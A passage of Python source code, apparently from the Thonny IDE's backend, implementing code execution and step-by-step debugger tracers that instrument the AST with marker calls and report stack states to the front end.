raise RuntimeError("Wrong type of command when waiting for input")
finally:
self._vm._exit_io_function()
def read(self, limit=-1):
return self._generic_read("read", limit)
def readline(self, limit=-1):
return self._generic_read("readline", limit)
def readlines(self, limit=-1):
return self._generic_read("readlines", limit)
def __next__(self):
return self.readline()
def __iter__(self):
return self
def prepare_hooks(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
try:
sys.meta_path.insert(0, self)
self._vm._install_custom_import()
return method(self, *args, **kwargs)
finally:
del sys.meta_path[0]
if hasattr(self._vm, "_original_import"):
self._vm._restore_original_import()
return wrapper
def return_execution_result(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
try:
result = method(self, *args, **kwargs)
if result is not None:
return result
return {"context_info": "after normal execution"}
except Exception:
return {"user_exception": self._vm._prepare_user_exception()}
return wrapper
class Executor:
def __init__(self, vm, original_cmd):
self._vm = vm
self._original_cmd = original_cmd
self._main_module_path = None
def execute_source(self, source, filename, mode, ast_postprocessors):
if isinstance(source, str):
# TODO: simplify this or make sure encoding is correct
source = source.encode("utf-8")
if os.path.exists(filename):
self._main_module_path = filename
global_vars = __main__.__dict__
statements = expression = None
try:
if mode == "exec+eval":
assert not ast_postprocessors
# Useful in shell to get last expression value in multi-statement block
root = self._prepare_ast(source, filename, "exec")
statements = compile(ast.Module(body=root.body[:-1]), filename, "exec")
expression = compile(ast.Expression(root.body[-1].value), filename, "eval")
else:
root = self._prepare_ast(source, filename, mode)
if mode == "eval":
assert not ast_postprocessors
expression = compile(root, filename, mode)
elif mode == "exec":
for func in ast_postprocessors:
func(root)
statements = compile(root, filename, mode)
else:
raise ValueError("Unknown mode")
return self._execute_prepared_user_code(statements, expression, global_vars)
except SyntaxError:
return {"user_exception": self._vm._prepare_user_exception()}
except SystemExit:
return {"SystemExit": True}
except Exception:
_report_internal_error()
return {}
@return_execution_result
@prepare_hooks
def _execute_prepared_user_code(self, statements, expression, global_vars):
if statements:
exec(statements, global_vars)
if expression:
value = eval(expression, global_vars)
if value is not None:
builtins._ = value
return {"value_info": self._vm.export_value(value)}
def find_spec(self, fullname, path=None, target=None):
"""override in subclass for custom-loading user modules"""
return None
def _prepare_ast(self, source, filename, mode):
return ast.parse(source, filename, mode)
class SimpleRunner(Executor):
pass
class Tracer(Executor):
def __init__(self, vm, original_cmd):
super().__init__(vm, original_cmd)
self._thonny_src_dir = os.path.dirname(sys.modules["thonny"].__file__)
self._fresh_exception = None
self._reported_frame_ids = set()
# first (automatic) stepping command depends on whether any breakpoints were set or not
breakpoints = self._original_cmd.breakpoints
assert isinstance(breakpoints, dict)
if breakpoints:
command_name = "resume"
else:
command_name = "step_into"
self._current_command = DebuggerCommand(
command_name,
state=None,
focus=None,
frame_id=None,
exception=None,
breakpoints=breakpoints,
)
def _trace(self, frame, event, arg):
raise NotImplementedError()
def _frame_is_alive(self, frame_id):
raise NotImplementedError()
def _execute_prepared_user_code(self, statements, expression, global_vars):
try:
sys.settrace(self._trace)
if hasattr(sys, "breakpointhook"):
old_breakpointhook = sys.breakpointhook
sys.breakpointhook = self._breakpointhook
return super()._execute_prepared_user_code(statements, expression, global_vars)
finally:
sys.settrace(None)
if hasattr(sys, "breakpointhook"):
sys.breakpointhook = old_breakpointhook
def _should_skip_frame(self, frame, event):
if event == "return":
# need to close frame in UI even if user issued Resume
return False
return (
not self._is_interesting_frame(frame)
or self._current_command.name == "resume"
and frame.f_code.co_filename not in self._current_command.breakpoints
)
def _is_interesting_frame(self, frame):
# For some reason Pylint doesn't see inspect.CO_GENERATOR and such
# pylint: disable=no-member
code = frame.f_code
return not (
code is None
or code.co_filename is None
or not self._is_interesting_module_file(code.co_filename)
or code.co_flags & inspect.CO_GENERATOR # @UndefinedVariable
or sys.version_info >= (3, 5)
and code.co_flags & inspect.CO_COROUTINE # @UndefinedVariable
or sys.version_info >= (3, 5)
and code.co_flags & inspect.CO_ITERABLE_COROUTINE # @UndefinedVariable
or sys.version_info >= (3, 6)
and code.co_flags & inspect.CO_ASYNC_GENERATOR # @UndefinedVariable
or "importlib._bootstrap" in code.co_filename
or self._vm.is_doing_io()
or path_startswith(code.co_filename, self._thonny_src_dir)
)
def _is_interesting_module_file(self, path):
# interesting files are the files in the same directory as main module
# or the ones with breakpoints
# When command is "resume", then only modules with breakpoints are interesting
# (used to be more flexible, but this caused problems
# when main script was in ~/. Then user site library became interesting as well)
return (
self._main_module_path is not None
and (
self._current_command.get("allow_stepping_into_libraries", False)
or is_same_path(os.path.dirname(path), os.path.dirname(self._main_module_path))
)
or path in self._current_command["breakpoints"]
)
def _is_interesting_exception(self, frame):
# interested only in exceptions in command frame or its parent frames
return id(frame) == self._current_command["frame_id"] or not self._frame_is_alive(
self._current_command["frame_id"]
)
def _fetch_next_debugger_command(self):
while True:
cmd = self._vm._fetch_command()
if isinstance(cmd, InlineCommand):
self._vm.handle_command(cmd)
else:
assert isinstance(cmd, DebuggerCommand)
return cmd
def _register_affected_frame(self, exception_obj, frame):
if not hasattr(exception_obj, "_affected_frame_ids_"):
exception_obj._affected_frame_ids_ = set()
exception_obj._affected_frame_ids_.add(id(frame))
def _get_current_exception(self):
if self._fresh_exception is not None:
return self._fresh_exception
else:
return sys.exc_info()
def _export_exception_info(self):
exc = self._get_current_exception()
if exc[0] is None:
return {
"id": None,
"msg": None,
"type_name": None,
"lines_with_frame_info": None,
"affected_frame_ids": set(),
"is_fresh": False,
}
else:
return {
"id": id(exc[1]),
"msg": str(exc[1]),
"type_name": exc[0].__name__,
"lines_with_frame_info": format_exception_with_frame_info(*exc),
"affected_frame_ids": exc[1]._affected_frame_ids_,
"is_fresh": exc == self._fresh_exception,
}
def _get_breakpoints_with_cursor_position(self, cmd):
if cmd["cursor_position"] is None:
return cmd["breakpoints"]
else:
result = copy.copy(cmd["breakpoints"])
path, line = cmd["cursor_position"]
if path not in result:
result[path] = set()
result[path].add(line)
return result
def _breakpointhook(self, *args, **kw):
pass
def _check_notify_return(self, frame_id):
if frame_id in self._reported_frame_ids:
            # Need extra notification, because it may be a long time until the next interesting event
self._vm.send_message(InlineResponse("debugger_return", frame_id=frame_id))
def _check_store_main_frame_id(self, frame):
if (
self._current_command.frame_id is None
and frame.f_code.co_filename == self._main_module_path
):
self._current_command.frame_id = id(frame)
class FastTracer(Tracer):
def __init__(self, vm, original_cmd):
super().__init__(vm, original_cmd)
self._alive_frame_ids = set()
def _breakpointhook(self, *args, **kw):
frame = inspect.currentframe()
while not self._is_interesting_frame(frame):
frame = frame.f_back
self._report_current_state(frame)
self._current_command = self._fetch_next_debugger_command()
def _trace(self, frame, event, arg):
if self._should_skip_frame(frame, event):
return None
if event == "call":
self._check_store_main_frame_id(frame)
self._fresh_exception = None
# can we skip this frame?
if self._current_command.name == "step_over" and not self._current_command.breakpoints:
return None
else:
self._alive_frame_ids.add(id(frame))
elif event == "return":
self._fresh_exception = None
self._alive_frame_ids.remove(id(frame))
self._check_notify_return(id(frame))
elif event == "exception":
self._fresh_exception = arg
self._register_affected_frame(arg[1], frame)
if self._is_interesting_exception(frame):
# UI doesn't know about separate exception events
self._report_current_state(frame)
self._current_command = self._fetch_next_debugger_command()
elif event == "line":
self._fresh_exception = None
handler = getattr(self, "_cmd_%s_completed" % self._current_command.name)
if handler(frame, self._current_command):
self._report_current_state(frame)
self._current_command = self._fetch_next_debugger_command()
else:
self._fresh_exception = None
return self._trace
def _report_current_state(self, frame):
stack = self._vm._export_stack(frame, self._is_interesting_frame)
msg = DebuggerResponse(
stack=stack,
in_present=True,
io_symbol_count=None,
exception_info=self._export_exception_info(),
tracer_class="FastTracer",
)
self._reported_frame_ids.update(map(lambda f: f.id, stack))
self._vm.send_message(msg)
def _cmd_step_into_completed(self, frame, cmd):
return True
def _cmd_step_over_completed(self, frame, cmd):
frame_id = id(frame)
return (
frame_id == cmd.frame_id
or cmd.frame_id not in self._alive_frame_ids
or self._at_a_breakpoint(frame, cmd)
)
def _cmd_step_out_completed(self, frame, cmd):
return cmd.frame_id not in self._alive_frame_ids or self._at_a_breakpoint(frame, cmd)
def _cmd_resume_completed(self, frame, cmd):
return self._at_a_breakpoint(frame, cmd)
def _cmd_run_to_cursor_completed(self, frame, cmd):
return self._at_a_breakpoint(frame, cmd, self._get_breakpoints_with_cursor_position(cmd))
def _at_a_breakpoint(self, frame, cmd, breakpoints=None):
# TODO: try re-entering same line in loop
if breakpoints is None:
breakpoints = cmd.breakpoints
filename = frame.f_code.co_filename
return filename in breakpoints and frame.f_lineno in breakpoints[filename]
def _frame_is_alive(self, frame_id):
return frame_id in self._alive_frame_ids
class NiceTracer(Tracer):
def __init__(self, vm, original_cmd):
super().__init__(vm, original_cmd)
self._instrumented_files = set()
self._install_marker_functions()
self._custom_stack = []
self._saved_states = []
self._current_state_index = 0
from collections import Counter
self._fulltags = Counter()
self._nodes = {}
def _breakpointhook(self, *args, **kw):
self._report_state(len(self._saved_states) - 1)
self._current_command = self._fetch_next_debugger_command()
def _install_marker_functions(self):
# Make dummy marker functions universally available by putting them
# into builtin scope
self.marker_function_names = {
BEFORE_STATEMENT_MARKER,
AFTER_STATEMENT_MARKER,
BEFORE_EXPRESSION_MARKER,
AFTER_EXPRESSION_MARKER,
}
for name in self.marker_function_names:
if not hasattr(builtins, name):
setattr(builtins, name, getattr(self, name))
def _prepare_ast(self, source, filename, mode):
# ast_utils need to be imported after asttokens
# is (custom-)imported
from thonny import ast_utils
root = ast.parse(source, filename, mode)
ast_utils.mark_text_ranges(root, source)
self._tag_nodes(root)
self._insert_expression_markers(root)
self._insert_statement_markers(root)
self._insert_for_target_markers(root)
self._instrumented_files.add(filename)
return root
def _should_skip_frame(self, frame, event):
code = frame.f_code
return (
# never skip marker functions, because they are triggers
# for adding new custom stack frames
code.co_name not in self.marker_function_names
and (
super()._should_skip_frame(frame, event)
or code.co_filename not in self._instrumented_files
)
)
def find_spec(self, fullname, path=None, target=None):
spec = PathFinder.find_spec(fullname, path, target)
if (
spec is not None
and isinstance(spec.loader, SourceFileLoader)
and getattr(spec, "origin", None)
and self._is_interesting_module_file(spec.origin)
):
spec.loader = FancySourceFileLoader(fullname, spec.origin, self)
return spec
else:
return super().find_spec(fullname, path, target)
def is_in_past(self):
return self._current_state_index < len(self._saved_states) - 1
def _trace(self, frame, event, arg):
try:
return self._trace_and_catch(frame, event, arg)
except BaseException:
traceback.print_exc()
sys.settrace(None)
return None
def _trace_and_catch(self, frame, event, arg):
"""
1) Detects marker calls and responds to client queries in these spots
2) Maintains a customized view of stack
"""
# frame skipping test should be done both in new frames and old ones (because of Resume)
# Note that intermediate frames can't be skipped when jumping to a breakpoint
# because of the need to maintain custom stack
if self._should_skip_frame(frame, event):
return None
code_name = frame.f_code.co_name
if event == "call":
self._fresh_exception = (
None
) # some code is running, therefore exception is not fresh anymore
if code_name in self.marker_function_names:
self._check_store_main_frame_id(frame.f_back)
# the main thing
if code_name == BEFORE_STATEMENT_MARKER:
event = "before_statement"
elif code_name == AFTER_STATEMENT_MARKER:
event = "after_statement"
elif code_name == BEFORE_EXPRESSION_MARKER:
event = "before_expression"
elif code_name == AFTER_EXPRESSION_MARKER:
event = "after_expression"
else:
raise AssertionError("Unknown marker function")
marker_function_args = frame.f_locals.copy()
node = self._nodes[marker_function_args["node_id"]]
del marker_function_args["self"]
if "call_function" not in node.tags:
self._handle_progress_event(frame.f_back, event, marker_function_args, node)
self._try_interpret_as_again_event(frame.f_back, event, marker_function_args, node)
else:
# Calls to proper functions.
# Client doesn't care about these events,
# it cares about "before_statement" events in the first statement of the body
self._custom_stack.append(CustomStackFrame(frame, "call"))
elif event == "exception":
self._fresh_exception = arg
self._register_affected_frame(arg[1], frame)
# use the state prepared by previous event
last_custom_frame = self._custom_stack[-1]
assert last_custom_frame.system_frame == frame
assert last_custom_frame.event.startswith("before_")
pseudo_event = last_custom_frame.event.replace("before_", "after_").replace(
"_again", ""
)
self._handle_progress_event(frame, pseudo_event, {}, last_custom_frame.node)
elif event == "return":
self._fresh_exception = None
if code_name not in self.marker_function_names:
frame_id = id(self._custom_stack[-1].system_frame)
self._check_notify_return(frame_id)
self._custom_stack.pop()
if len(self._custom_stack) == 0:
# We popped last frame, this means our program has ended.
# There may be more events coming from upper (system) frames
# but we're not interested in those
sys.settrace(None)
else:
pass
else:
self._fresh_exception = None
return self._trace
def _handle_progress_event(self, frame, event, args, node):
self._save_current_state(frame, event, args, node)
self._respond_to_commands()
def _save_current_state(self, frame, event, args, node):
"""
Updates custom stack and stores the state
self._custom_stack always keeps last info,
which gets exported as FrameInfos to _saved_states["stack"]
"""
focus = TextRange(node.lineno, node.col_offset, node.end_lineno, node.end_col_offset)
custom_frame = self._custom_stack[-1]
custom_frame.event = event
custom_frame.focus = focus
custom_frame.node = node
custom_frame.node_tags = node.tags
if self._saved_states:
prev_state = self._saved_states[-1]
prev_state_frame = self._create_actual_active_frame(prev_state)
else:
prev_state = None
prev_state_frame = None
# store information about current statement / expression
if "statement" in event:
custom_frame.current_statement = focus
if event == "before_statement_again":
# keep the expression information from last event
pass
else:
custom_frame.current_root_expression = None
custom_frame.current_evaluations = []
else:
assert "expression" in event
assert prev_state_frame is not None
# see whether current_root_expression needs to be updated
prev_root_expression = prev_state_frame.current_root_expression
if event == "before_expression" and (
id(frame) != id(prev_state_frame.system_frame)
or "statement" in prev_state_frame.event
or not range_contains_smaller_or_equal(prev_root_expression, focus)
):
custom_frame.current_root_expression = focus
custom_frame.current_evaluations = []
if event == "after_expression" and "value" in args:
# value is missing in case of exception
custom_frame.current_evaluations.append(
(focus, self._vm.export_value(args["value"]))
)
# Save the snapshot.
# Check if we can share something with previous state
if (
prev_state is not None
and id(prev_state_frame.system_frame) == id(frame)
and prev_state["exception_value"] is self._get_current_exception()[1]
and prev_state["fresh_exception_id"] == id(self._fresh_exception)
and ("before" in event or "skipexport" in node.tags)
):
exception_info = prev_state["exception_info"]
# share the stack ...
stack = prev_state["stack"]
# ... but override certain things
active_frame_overrides = {
"event": custom_frame.event,
"focus": custom_frame.focus,
"node_tags": custom_frame.node_tags,
"current_root_expression": custom_frame.current_root_expression,
"current_evaluations": custom_frame.current_evaluations.copy(),
"current_statement": custom_frame.current_statement,
}
else:
# make full export
stack = self._export_stack()
exception_info = self._export_exception_info()
active_frame_overrides = {}
msg = {
"stack": stack,
"active_frame_overrides": active_frame_overrides,
"in_client_log": False,
"io_symbol_count": (
sys.stdin._processed_symbol_count
+ sys.stdout._processed_symbol_count
+ sys.stderr._processed_symbol_count
),
"exception_value": self._get_current_exception()[1],
"fresh_exception_id": id(self._fresh_exception),
"exception_info": exception_info,
}
self._saved_states.append(msg)
def _respond_to_commands(self):
"""Tries to respond to client commands with states collected so far.
Returns if these states don't suffice anymore and Python needs
to advance the program"""
# while the state for current index is already saved:
while self._current_state_index < len(self._saved_states):
state = self._saved_states[self._current_state_index]
            # Get current state's most recent frame (together with overrides)
frame = self._create_actual_active_frame(state)
# Is this state meant to be seen?
if "skip_" + frame.event not in frame.node_tags:
# if True:
# Has the command completed?
tester = getattr(self, "_cmd_" + self._current_command.name + "_completed")
cmd_complete = tester(frame, self._current_command)
if cmd_complete:
state["in_client_log"] = True
self._report_state(self._current_state_index)
self._current_command = self._fetch_next_debugger_command()
if self._current_command.name == "step_back":
if self._current_state_index == 0:
# Already in first state. Remain in this loop
pass
else:
assert self._current_state_index > 0
# Current event is no longer present in GUI "undo log"
self._saved_states[self._current_state_index]["in_client_log"] = False
self._current_state_index -= 1
else:
# Other commands move the pointer forward
self._current_state_index += 1
def _create_actual_active_frame(self, state):
return state["stack"][-1]._replace(**state["active_frame_overrides"])
def _report_state(self, state_index):
in_present = state_index == len(self._saved_states) - 1
if in_present:
# For reported new events re-export stack to make sure it is not shared.
# (There is tiny chance that sharing previous state
# after executing BinOp, Attribute, Compare or Subscript
# was not the right choice. See tag_nodes for more.)
# Re-exporting reduces the harm by showing correct data at least
# for present states.
self._saved_states[state_index]["stack"] = self._export_stack()
# need to make a copy for applying overrides
# and removing helper fields without modifying original
state = self._saved_states[state_index].copy()
state["stack"] = state["stack"].copy()
state["in_present"] = in_present
if not in_present:
# for past states fix the newest frame
state["stack"][-1] = self._create_actual_active_frame(state)
del state["exception_value"]
del state["active_frame_overrides"]
# Convert stack of TempFrameInfos to stack of FrameInfos
new_stack = []
for tframe in state["stack"]:
system_frame = tframe.system_frame
module_name = system_frame.f_globals["__name__"]
code_name = system_frame.f_code.co_name
source, firstlineno, in_library = self._vm._get_frame_source_info(system_frame)
assert firstlineno is not None, "nofir " + str(system_frame)
frame_id = id(system_frame)
new_stack.append(
FrameInfo(
id=frame_id,
filename=system_frame.f_code.co_filename,
module_name=module_name,
code_name=code_name,
locals=tframe.locals,
globals=tframe.globals,
freevars=system_frame.f_code.co_freevars,
source=source,
lineno=system_frame.f_lineno,
firstlineno=firstlineno,
in_library=in_library,
event=tframe.event,
focus=tframe.focus,
node_tags=tframe.node_tags,
current_statement=tframe.current_statement,
current_evaluations=tframe.current_evaluations,
current_root_expression=tframe.current_root_expression,
)
)
self._reported_frame_ids.add(frame_id)
state["stack"] = new_stack
state["tracer_class"] = "NiceTracer"
self._vm.send_message(DebuggerResponse(**state))
def _try_interpret_as_again_event(self, frame, original_event, original_args, original_node):
"""
        Some after_* events can also be interpreted as
        "before_*_again" events (e.g. when the last argument of a call has been
        evaluated, we are just before executing the final stage of the call)
"""
if original_event == "after_expression":
value = original_args.get("value")
if (
"last_child" in original_node.tags
or "or_arg" in original_node.tags
and value
or "and_arg" in original_node.tags
and not value
):
# there may be explicit exceptions
if (
"skip_after_statement_again" in original_node.parent_node.tags
or "skip_after_expression_again" in original_node.parent_node.tags
):
return
# next step will be finalizing evaluation of parent of current expr
# so let's say we're before that parent expression
again_args = {"node_id": id(original_node.parent_node)}
again_event = (
"before_expression_again"
if "child_of_expression" in original_node.tags
else "before_statement_again"
)
self._handle_progress_event(
frame, again_event, again_args, original_node.parent_node
)
def _cmd_step_over_completed(self, frame, cmd):
"""
Identifies the moment when piece of code indicated by cmd.frame_id and cmd.focus
has completed execution (either successfully or not).
"""
if self._at_a_breakpoint(frame, cmd):
return True
# Make sure the correct frame_id is selected
if id(frame.system_frame) == cmd.frame_id:
# We're in the same frame
if "before_" in cmd.state:
if not range_contains_smaller_or_equal(cmd.focus, frame.focus):
# Focus has changed, command has completed
return True
else:
# Keep running
return False
elif "after_" in cmd.state:
if (
frame.focus != cmd.focus
or "before_" in frame.event
or "_expression" in cmd.state
and "_statement" in frame.event
or "_statement" in cmd.state
and "_expression" in frame.event
):
# The state has changed, command has completed
return True
else:
# Keep running
return False
else:
# We're in another frame
if self._frame_is_alive(cmd.frame_id):
# We're in a successor frame, keep running
return False
else:
# Original frame has completed, assumedly because of an exception
# We're done
return True
return True # not actually required, just to make Pylint happy
def _cmd_step_into_completed(self, frame, cmd):
return frame.event != "after_statement"
def _cmd_step_back_completed(self, frame, cmd):
# Check if the selected message has been previously sent to front-end
return (
self._saved_states[self._current_state_index]["in_client_log"]
or self._current_state_index == 0
)
def _cmd_step_out_completed(self, frame, cmd):
if self._current_state_index == 0:
return False
if frame.event == "after_statement":
return False
if self._at_a_breakpoint(frame, cmd):
return True
prev_state_frame = self._saved_states[self._current_state_index - 1]["stack"][-1]
return (
# the frame has completed
not self._frame_is_alive(cmd.frame_id)
# we're in the same frame but on higher level
# TODO: expression inside statement expression has same range as its parent
or id(frame.system_frame) == cmd.frame_id
and range_contains_smaller(frame.focus, cmd.focus)
# or we were there in prev state
or id(prev_state_frame.system_frame) == cmd.frame_id
and range_contains_smaller(prev_state_frame.focus, cmd.focus)
)
def _cmd_resume_completed(self, frame, cmd):
return self._at_a_breakpoint(frame, cmd)
def _cmd_run_to_cursor_completed(self, frame, cmd):
return self._at_a_breakpoint(frame, cmd, self._get_breakpoints_with_cursor_position(cmd))
def _at_a_breakpoint(self, frame, cmd, breakpoints=None):
if breakpoints is None:
breakpoints = cmd["breakpoints"]
return (
frame.event in ["before_statement", "before_expression"]
and frame.system_frame.f_code.co_filename in breakpoints
and frame.focus.lineno in breakpoints[frame.system_frame.f_code.co_filename]
# consider only first event on a line
# (but take into account that same line may be reentered)
and (
cmd.focus is None
or (cmd.focus.lineno != frame.focus.lineno)
or (cmd.focus == frame.focus and cmd.state == frame.event)
or id(frame.system_frame) != cmd.frame_id
)
)
def _frame_is_alive(self, frame_id):
for frame in self._custom_stack:
if id(frame.system_frame) == frame_id:
return True
return False
def _export_stack(self):
result = []
exported_globals_per_module = {}
def export_globals(module_name, frame):
if module_name not in exported_globals_per_module:
exported_globals_per_module[module_name] = self._vm.export_variables(
frame.f_globals
)
return exported_globals_per_module[module_name]
for custom_frame in self._custom_stack:
system_frame = custom_frame.system_frame
module_name = system_frame.f_globals["__name__"]
result.append(
TempFrameInfo(
# need to store the reference to the frame to avoid it being GC-d
# otherwise frame id-s would be reused and this would
# mess up communication with the frontend.
system_frame=system_frame,
locals=None
if system_frame.f_locals is system_frame.f_globals
else self._vm.export_variables(system_frame.f_locals),
globals=export_globals(module_name, system_frame),
event=custom_frame.event,
focus=custom_frame.focus,
node_tags=custom_frame.node_tags,
current_evaluations=custom_frame.current_evaluations.copy(),
current_statement=custom_frame.current_statement,
current_root_expression=custom_frame.current_root_expression,
)
)
assert result # not empty
return result
def _thonny_hidden_before_stmt(self, node_id):
# The code to be debugged will be instrumented with this function
# inserted before each statement.
# Entry into this function indicates that statement as given
# by the code range is about to be evaluated next.
return None
def _thonny_hidden_after_stmt(self, node_id):
# The code to be debugged will be instrumented with this function
# inserted after each statement.
# Entry into this function indicates that statement as given
# by the code range was just executed successfully.
return None
def _thonny_hidden_before_expr(self, node_id):
# Entry into this function indicates that expression as given
# by the code range is about to be evaluated next
return node_id
def _thonny_hidden_after_expr(self, node_id, value):
# The code to be debugged will be instrumented with this function
# wrapped around each expression (given as 2nd argument).
# Entry into this function indicates that expression as given
# by the code range was just evaluated to given value
return value
def _tag_nodes(self, root):
"""Marks interesting properties of AST nodes"""
# ast_utils need to be imported after asttokens
# is (custom-)imported
from thonny import ast_utils
def add_tag(node, tag):
if not hasattr(node, "tags"):
node.tags = set()
node.tags.add("class=" + node.__class__.__name__)
node.tags.add(tag)
# ignore module docstring if it is before from __future__ import
if (
isinstance(root.body[0], ast.Expr)
and isinstance(root.body[0].value, ast.Str)
and len(root.body) > 1
and isinstance(root.body[1], ast.ImportFrom)
and root.body[1].module == "__future__"
):
add_tag(root.body[0], "ignore")
add_tag(root.body[0].value, "ignore")
add_tag(root.body[1], "ignore")
for node in ast.walk(root):
if not isinstance(node, (ast.expr, ast.stmt)):
if isinstance(node, ast.comprehension):
for expr in node.ifs:
add_tag(expr, "comprehension.if")
continue
# tag last children
last_child = ast_utils.get_last_child(node)
assert last_child in [True, False, None] or isinstance(
last_child, (ast.expr, ast.stmt, type(None))
), ("Bad last child " + str(last_child) + " of " + str(node))
if last_child is not None:
add_tag(node, "has_children")
if isinstance(last_child, ast.AST):
last_child.parent_node = node
add_tag(last_child, "last_child")
if isinstance(node, _ast.expr):
add_tag(last_child, "child_of_expression")
else:
add_tag(last_child, "child_of_statement")
if isinstance(node, ast.Call):
add_tag(last_child, "last_call_arg")
# other cases
if isinstance(node, ast.Call):
add_tag(node.func, "call_function")
node.func.parent_node = node
            if isinstance(node, ast.BoolOp) and isinstance(node.op, ast.Or):
                for child in node.values:
                    add_tag(child, "or_arg")
                    child.parent_node = node
            if isinstance(node, ast.BoolOp) and isinstance(node.op, ast.And):
                for child in node.values:
                    add_tag(child, "and_arg")
                    child.parent_node = node
# TODO: assert (it doesn't evaluate msg when test == True)
if isinstance(node, ast.Str):
add_tag(node, "skipexport")
if hasattr(ast, "JoinedStr") and isinstance(node, ast.JoinedStr):
# can't present children normally without
# ast giving correct locations for them
add_tag(node, "ignore_children")
elif isinstance(node, ast.Num):
add_tag(node, "skipexport")
elif isinstance(node, ast.List):
add_tag(node, "skipexport")
elif isinstance(node, ast.Tuple):
add_tag(node, "skipexport")
elif isinstance(node, ast.Set):
add_tag(node, "skipexport")
elif isinstance(node, ast.Dict):
add_tag(node, "skipexport")
elif isinstance(node, ast.Name):
add_tag(node, "skipexport")
elif isinstance(node, ast.NameConstant):
add_tag(node, "skipexport")
elif hasattr(ast, "Constant") and isinstance(node, ast.Constant):
add_tag(node, "skipexport")
elif isinstance(node, ast.Expr):
if not isinstance(node.value, (ast.Yield, ast.YieldFrom)):
add_tag(node, "skipexport")
elif isinstance(node, ast.If):
add_tag(node, "skipexport")
elif isinstance(node, ast.Return):
add_tag(node, "skipexport")
elif isinstance(node, ast.While):
add_tag(node, "skipexport")
elif isinstance(node, ast.Continue):
add_tag(node, "skipexport")
elif isinstance(node, ast.Break):
add_tag(node, "skipexport")
elif isinstance(node, ast.Pass):
add_tag(node, "skipexport")
elif isinstance(node, ast.For):
add_tag(node, "skipexport")
elif isinstance(node, ast.Try):
add_tag(node, "skipexport")
elif isinstance(node, ast.ListComp):
add_tag(node.elt, "ListComp.elt")
if len(node.generators) > 1:
add_tag(node, "ignore_children")
elif isinstance(node, ast.SetComp):
add_tag(node.elt, "SetComp.elt")
if len(node.generators) > 1:
add_tag(node, "ignore_children")
elif isinstance(node, ast.DictComp):
add_tag(node.key, "DictComp.key")
add_tag(node.value, "DictComp.value")
if len(node.generators) > 1:
add_tag(node, "ignore_children")
elif isinstance(node, ast.BinOp):
# TODO: use static analysis to detect type of left child
add_tag(node, "skipexport")
elif isinstance(node, ast.Attribute):
# TODO: use static analysis to detect type of left child
add_tag(node, "skipexport")
elif isinstance(node, ast.Subscript):
# TODO: use static analysis to detect type of left child
add_tag(node, "skipexport")
elif isinstance(node, ast.Compare):
# TODO: use static analysis to detect type of left child
add_tag(node, "skipexport")
if isinstance(node, (ast.Assign)):
# value will be presented in assignment's before_statement_again
add_tag(node.value, "skip_after_expression")
if isinstance(node, (ast.Expr, ast.While, ast.For, ast.If, ast.Try, ast.With)):
add_tag(node, "skip_after_statement_again")
# make sure every node has this field
if not hasattr(node, "tags"):
node.tags = set()
def _should_instrument_as_expression(self, node):
return (
isinstance(node, _ast.expr)
and not getattr(node, "incorrect_range", False)
and "ignore" not in node.tags
and (not hasattr(node, "ctx") or isinstance(node.ctx, ast.Load))
# TODO: repeatedly evaluated subexpressions of comprehensions
# can be supported (but it requires some redesign both in backend and GUI)
and "ListComp.elt" not in node.tags
and "SetComp.elt" not in node.tags
and "DictComp.key" not in node.tags
and "DictComp.value" not in node.tags
and "comprehension.if" not in node.tags
)
def _should_instrument_as_statement(self, node):
return (
isinstance(node, _ast.stmt)
and not getattr(node, "incorrect_range", False)
and "ignore" not in node.tags
# Shouldn't insert anything before from __future__ import
# as this is not a normal statement
# https://bitbucket.org/plas/thonny/issues/183/thonny-throws-false-positive-syntaxerror
and (not isinstance(node, ast.ImportFrom) or node.module != "__future__")
)
def _insert_statement_markers(self, root):
# find lists of statements and insert before/after markers for each statement
for name, value in ast.iter_fields(root):
if isinstance(root, ast.Try) and name == "handlers":
# contains statements but is not statement itself
for handler in value:
self._insert_statement_markers(handler)
elif isinstance(value, ast.AST):
self._insert_statement_markers(value)
elif isinstance(value, list):
if len(value) > 0:
new_list = []
for node in value:
if self._should_instrument_as_statement(node):
# self._debug("EBFOMA", node)
# add before marker
new_list.append(
self._create_statement_marker(node, BEFORE_STATEMENT_MARKER)
)
# original statement
if self._should_instrument_as_statement(node):
self._insert_statement_markers(node)
new_list.append(node)
if (
self._should_instrument_as_statement(node)
and "skipexport" not in node.tags
):
# add after marker
new_list.append(
self._create_statement_marker(node, AFTER_STATEMENT_MARKER)
)
setattr(root, name, new_list)
def _create_statement_marker(self, node, function_name):
call = self._create_simple_marker_call(node, function_name)
stmt = ast.Expr(value=call)
ast.copy_location(stmt, node)
ast.fix_missing_locations(stmt)
return stmt
def _insert_for_target_markers(self, root):
"""inserts markers which notify assignment to for-loop variables"""
for node in ast.walk(root):
if isinstance(node, ast.For):
old_target = node.target
# print(vars(old_target))
temp_name = "__for_loop_var"
node.target = ast.Name(temp_name, ast.Store())
name_load = ast.Name(temp_name, ast.Load())
# value will be visible in parent's before_statement_again event
name_load.tags = {"skip_before_expression", "skip_after_expression", "last_child"}
name_load.lineno, name_load.col_offset = (node.iter.lineno, node.iter.col_offset)
name_load.end_lineno, name_load.end_col_offset = (
node.iter.end_lineno,
node.iter.end_col_offset,
)
before_name_load = self._create_simple_marker_call(
name_load, BEFORE_EXPRESSION_MARKER
)
after_name_load = ast.Call(
func=ast.Name(id=AFTER_EXPRESSION_MARKER, ctx=ast.Load()),
args=[before_name_load, name_load],
keywords=[],
)
ass = ast.Assign([old_target], after_name_load)
ass.lineno, ass.col_offset = old_target.lineno, old_target.col_offset
ass.end_lineno, ass.end_col_offset = (
node.iter.end_lineno,
node.iter.end_col_offset,
)
ass.tags = {"skip_before_statement"} # before_statement_again will be shown
name_load.parent_node = ass
ass_before = self._create_statement_marker(ass, BEFORE_STATEMENT_MARKER)
node.body.insert(0, ass_before)
node.body.insert(1, ass)
node.body.insert(2, self._create_statement_marker(ass, AFTER_STATEMENT_MARKER))
ast.fix_missing_locations(node)
def _insert_expression_markers(self, node):
"""
TODO: this docstring is outdated
each expression e gets wrapped like this:
_after(_before(_loc, _node_is_zoomable), e, _node_role, _parent_range)
where
_after is function that gives the resulting value
_before is function that signals the beginning of evaluation of e
_loc gives the code range of e
_node_is_zoomable indicates whether this node has subexpressions
_node_role is either 'last_call_arg', 'last_op_arg', 'first_or_arg',
'first_and_arg', 'function' or None
"""
tracer = self
class ExpressionVisitor(ast.NodeTransformer):
def generic_visit(self, node):
if isinstance(node, _ast.expr):
if isinstance(node, ast.Starred):
# keep this node as is, but instrument its children
